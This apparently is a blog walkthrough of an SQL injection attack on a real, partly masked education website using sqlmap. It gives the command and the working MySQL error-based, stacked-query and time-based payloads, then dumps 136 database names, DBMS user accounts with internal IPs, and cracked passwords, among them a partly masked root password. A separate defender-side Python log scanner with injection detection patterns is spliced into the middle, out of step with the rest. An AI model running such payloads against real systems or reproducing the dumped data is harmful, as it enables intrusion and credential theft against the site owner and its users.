sqlmap in Practice (Chapter 1)
1. Finding the injection point:
D:\Python27\sqlmap>sqlmap.py -u http://xxcg.*****.com/learninglevel/SubjectDetail?id=35 --dbs
2. Enumerating the databases
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=35 AND (SELECT 2685 FROM(SELECT COUNT(*),CONCAT(0x7178626b71,(SELECT (CASE WHEN (2685=2685) THEN 1 ELSE 0 END)),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: id=35; SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=35 AND SLEEP(5)
---
[15:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0
[15:36:55] [INFO] fetching database names
[15:36:55] [INFO] the SQL query used returns 136 entries
available databases [136]:
[*] beehive_listenread
[*] beehive_pointmall
[*] beehive_synchronwork
[*] beehive_voicespeech
[*] beehivedb
[*] bookcase
[*] ciwong_colorful
[*] ciwong_newsmanagement
[*] ciwong_qr
[*] cloudreader
[*] cmsdata
[*] cw_6v68_settlement
[*] cw_admin_elearning
[*] cw_admin_elearning_bak
[*] cw_app_store
[*] cw_audio_video_db
[*] cw_basedapplications
[*] cw_chinadream
[*] cw_cooperator
[*] cw_dw
[*] cw_edu
[*] cw_elearning
[*] cw_elearning_bak
[*] cw_englishshow
[*] cw_eshop_cart
[*] cw_eshop_common
[*] cw_eshop_news
[*] cw_eshop_order
[*] cw_eshop_product
[*] cw_eshop_user
[*] cw_gwy
[*] cw_hd
[*] cw_homepage
[*] cw_jibei
[*] cw_jibei_school
[*] cw_learnmonth
[*] cw_microvideo
[*] cw_netschool
[*] cw_packager_arithmetic
[*] cw_packager_arithmetic_en
[*] cw_packager_ebook
[*] cw_packager_experiment
[*] cw_packager_experiment_v2
[*] cw_packager_kousuan
[*] cw_packager_learning_level
[*] cw_packager_listenning_ch
[*] cw_packager_listenning_ch_v2
[*] cw_packager_listenning_en
[*] cw_packager_listenning_en_v2
[*] cw_packager_playwords
[*] cw_packager_reading_ch
[*] cw_packager_reading_en
[*] cw_packager_speaking_en
[*] cw_pay
[*] cw_press
[*] cw_press_new
[*] cw_recommend
[*] cw_resx_center
[*] cw_settlement
[*] cw_trainingdb
[*] cw_workcategory
[*] cw_workcategory_arithmetic
[*] cw_workcategory_arithmetic_en
[*] cw_workcategory_common
[*] cw_workcategory_ebook
[*] cw_workcategory_experience
[*] cw_workcategory_experiment
[*] cw_workcategory_experiment_v2
[*] cw_workcategory_learning_level
[*] cw_workcategory_listenning_ch
[*] cw_workcategory_listenning_ch_v2
[*] cw_workcategory_listenning_en
[*] cw_workcategory_listenning_en_v2
[*] cw_workcategory_more
[*] cw_workcategory_playwords
[*] cw_workcategory_reading_ch
[*] cw_workcategory_reading_en
[*] cw_workcategory_settings
[*] cw_workcategory_speaking_en
[*] cw_workshop
[*] cw_workshop2
[*] cw_yishang
[*] cw_yishang1
[*] cw_yishang_settle
[*] cw_ziyuan
[*] cwapi
[*] cwfav
[*] db_ciliao
[*] db_filestatus
[*] db_kousuan100
[*] db_statistics
[*] db_txb
[*] db_txb_paipai
[*] efficientclassroom
[*] enterprisestudy
[*] game
[*] gxktv3
[*] gxktv3_resource
[*] information
[*] information_schema
[*] microrecord
[*] mysql
[*] notebook_good
[*] notebook_mistake
[*] notebook_senten
[*] notebook_word
[*] performance_schema
[*] qc_ciwong
[*] quesdata
[*] research
[*] research_ky
[*] roompermissionjingsai
[*] schoolzone
[*] searcher
[*] synchpreparation
[*] szdsy2013
[*] t_db_areaconf
[*] t_db_jibei
[*] t_db_listening
[*] t_db_markham
[*] t_db_reportlog
[*] t_db_roomtask
[*] t_db_tinyurl
[*] test
[*] videouser
[*] wiki
[*] wikicommunity
[*] wikipoint
[*] wikiques
[*] wordstockchinese
[*] wordstockenglish
[*] wordstockenglishchangebuilding
[*] wordstockenglishchangeclassifying
[*] wordstockenglishchangescene
[*] wordstocktempresources
[*] work_listen
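The three techniques sqlmap reported for the id parameter above (error-based, stacked queries, time-based blind) each leave a recognisable signature in the web server's request log. The following is an added defender-side example, not code from the original post: it decodes constructed IIS W3C log lines (the field order and the sample requests are assumptions) and reports which technique each request matches.

```python
import re
from urllib.parse import unquote_plus

# One regex per technique sqlmap reported for the id parameter on this page.
TECHNIQUE_PATTERNS = {
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|INFORMATION_SCHEMA\.", re.I),
    "stacked queries": re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)|\bBENCHMARK\s*\(", re.I),
}

# Constructed IIS W3C log sample (assumed field order; client IP is a documentation address).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2014-05-20 15:36:50 203.0.113.10 GET /learninglevel/SubjectDetail id=35 200",
    "2014-05-20 15:36:52 203.0.113.10 GET /learninglevel/SubjectDetail id=35+AND+(SELECT+2685+FROM(SELECT+COUNT(*),"
    "CONCAT(0x7178626b71,(SELECT+(CASE+WHEN+(2685%3D2685)+THEN+1+ELSE+0+END)),0x71787a6271,FLOOR(RAND(0)*2))x"
    "+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) 500",
    "2014-05-20 15:36:53 203.0.113.10 GET /learninglevel/SubjectDetail id=35%3B+SELECT+SLEEP(5)-- 200",
    "2014-05-20 15:36:55 203.0.113.10 GET /learninglevel/SubjectDetail id=35+AND+SLEEP(5) 200",
]


def parse_iis_line(line):
    """Split one W3C line into the fields we need; header/comment lines return None."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 7:
        return None
    # The query string is URL-encoded in the log, so decode it before matching.
    return {"ip": parts[2], "stem": parts[4], "query": unquote_plus(parts[5]), "status": parts[6]}


def classify(query):
    """Return the technique labels whose signature appears in a decoded query string."""
    return [name for name, pat in TECHNIQUE_PATTERNS.items() if pat.search(query)]


def scan(lines):
    """Return (client ip, uri stem, techniques) for every request matching a signature."""
    hits = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        found = classify(rec["query"])
        if found:
            hits.append((rec["ip"], rec["stem"], found))
    return hits


if __name__ == "__main__":
    for ip, stem, techniques in scan(SAMPLE_LOG):
        print(f"{ip} {stem}: {', '.join(techniques)}")
```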
3. Enumerating the DBMS users
database management system users [24]:
[*] 'backup'@'192.168.1.101'
[*] 'backup'@'192.168.1.237'
[*] 'bkpuser'@'127.0.0.1'
[*] 'bruce'@'%'
[*] 'cacti'@'192.168.1.241'
[*] 'china_read'@'%'
[*] '*****'@'%'
[*] '***_it'@'%'
[*] 'leoxqing'@'192.168.1.241'
[*] 'repl'@'192.168.1.%'
[*] 'repl_ck'@'192.168.1.%'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.1.100'
[*] 'root'@'192.168.1.233'
[*] 'root'@'192.168.1.234'
[*] 'root'@'192.168.1.241'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'videouser'@'%'
[*] 'webadmin_pac'@'%'
[*] 'wordchange'@'%'
[*] 'zhiligame'@'%'
[*] 'ziyuan'@'%'
Finally, the passwords were cracked as well:
[15:17:27] [INFO] cracked password '***' for user 'videouser'
[15:17:27] [INFO] cracked password '***' for user 'backup'
[15:17:38] [INFO] using suffix '1'
[15:17:54] [INFO] using suffix '***'
[15:18:03] [INFO] cracked password 'object***' for user 'root'
[15:18:06] [INFO] cracked password 'zhiligame***' for user 'bkpuser'